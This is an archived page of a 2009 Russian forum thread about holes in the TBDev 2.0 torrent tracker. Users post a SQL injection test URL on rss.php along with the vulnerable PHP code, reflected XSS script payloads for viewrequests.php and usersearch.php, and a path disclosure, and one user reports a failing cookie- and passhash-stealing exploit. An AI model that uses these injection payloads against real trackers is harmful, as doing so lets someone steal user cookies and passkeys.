HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Трекер-движок TBDev 2.0
   
Ответ
Страница 14 из 27 « Первая < 4 10 11 12 13 14 15 16 17 18 24 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #131  
Старый 03.07.2009, 19:10
YouSeeBeter
Banned
Регистрация: 02.07.2009
Сообщений: 3
Провел на форуме:
43681

Репутация: 0
По умолчанию
эксплоит Qwazar'a как-будто вымер.

Сейчас тестировал его на чистом SKy tracker где есть уязвимость:

Trying to get your cookies... [DONE]
Trying to get passhash:
Exploit failed


Проверьте сами, даже где пахал не пашет, помогите...
 
Ответить с цитированием

  #132  
Старый 06.07.2009, 23:18
Rostov114
Познающий
Регистрация: 05.09.2008
Сообщений: 33
Провел на форуме:
95382

Репутация: 29
Отправить сообщение для Rostov114 с помощью ICQ Отправить сообщение для Rostov114 с помощью AIM Отправить сообщение для Rostov114 с помощью Yahoo
По умолчанию
Цитата:
Сообщение от YouSeeBeter  
Проверьте сами, даже где пахал не пашет, помогите...
Cнимай штаны и бегай.
А по сабжу....проблема не в сплоите, а в тебе.

P.S. Простите не удержался.
 
Ответить с цитированием

  #133  
Старый 08.07.2009, 21:07
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию
http://127.0.0.1/treker/rss.php?passkey=1'

SQL

Код:
$passkey = $_GET["passkey"];
if ($passkey) {
$user = mysql_fetch_row(sql_query("SELECT COUNT(*) FROM users WHERE passkey = '$passkey'"));
if ($user[0] != 1)
exit();
} else
loggedinorreturn();
XSS

http://127.0.0.1/treker/viewrequests.php?sort=%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E





P.S. сорр не бегал по всем страницам так что не знаю выкладывали или нет багу =)



http://127.0.0.1/treker/usersearch.php?r=%22%3Cscript%3Ealert(/XSS/)%3C/script%3E

=\ что то не понял...есть тут что нить или просто косяк кода?

во всех(или нет, не проверял) usersearch.php?....=%22%3Cscript%3Ealert(/XSS/)%3C/script%3E

такой косяк))))
Последний раз редактировалось HAXTA4OK; 08.07.2009 в 21:44..
 
Ответить с цитированием

  #134  
Старый 08.07.2009, 21:57
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию
http://127.0.0.1/treker/userhistory.php?action=viewposts&id=x


x= id у которого нету постов как я понял ..и он выдаст ошибку ))) но SQL не провернуть так как нету таблы такой у меня

так что наверно к разряду раскрытие путей
 
Ответить с цитированием

  #135  
Старый 09.07.2009, 15:53
Yuna
Познающий
Регистрация: 22.06.2009
Сообщений: 41
Провел на форуме:
47299

Репутация: 18
По умолчанию
usersearch.php дыряв на XSS лучше чем решето =)))
 
Ответить с цитированием

  #136  
Старый 09.07.2009, 22:44
peonix
Познающий
Регистрация: 09.11.2008
Сообщений: 34
Провел на форуме:
36308

Репутация: 2
По умолчанию
Цитата:
Сообщение от Yuna  
usersearch.php дыряв на XSS лучше чем решето =)))
а по подробнее можно? и в каких версиях?
 
Ответить с цитированием

  #137  
Старый 10.07.2009, 12:18
Yuna
Познающий
Регистрация: 22.06.2009
Сообщений: 41
Провел на форуме:
47299

Репутация: 18
По умолчанию
во всех
 
Ответить с цитированием

  #138  
Старый 12.07.2009, 01:13
peonix
Познающий
Регистрация: 09.11.2008
Сообщений: 34
Провел на форуме:
36308

Репутация: 2
По умолчанию
Цитата:
Сообщение от Yuna  
во всех
напиши что за XSS ты узал если не трудно...
 
Ответить с цитированием

  #139  
Старый 12.07.2009, 11:42
Yuna
Познающий
Регистрация: 22.06.2009
Сообщений: 41
Провел на форуме:
47299

Репутация: 18
По умолчанию
для начала просто код откройте - нет проверки $_GET ваще никакой в файле...
 
Ответить с цитированием

  #140  
Старый 13.07.2009, 02:49
peonix
Познающий
Регистрация: 09.11.2008
Сообщений: 34
Провел на форуме:
36308

Репутация: 2
По умолчанию
Yuna
а через какой скрипт Вы в usersearch.php параметры передавали? просто так его вызвать нельзя...
 
Ответить с цитированием
Ответ
Страница 14 из 27 « Первая < 4 10 11 12 13 14 15 16 17 18 24 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Прошивку iPhone 2.0 взломали ещё до её выхода geforse Мировые новости. Обсуждения. 1 14.07.2008 22:41
Web 2.0 выходит на государственный уровень vadim399 Мировые новости. Обсуждения. 2 12.01.2008 18:06



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ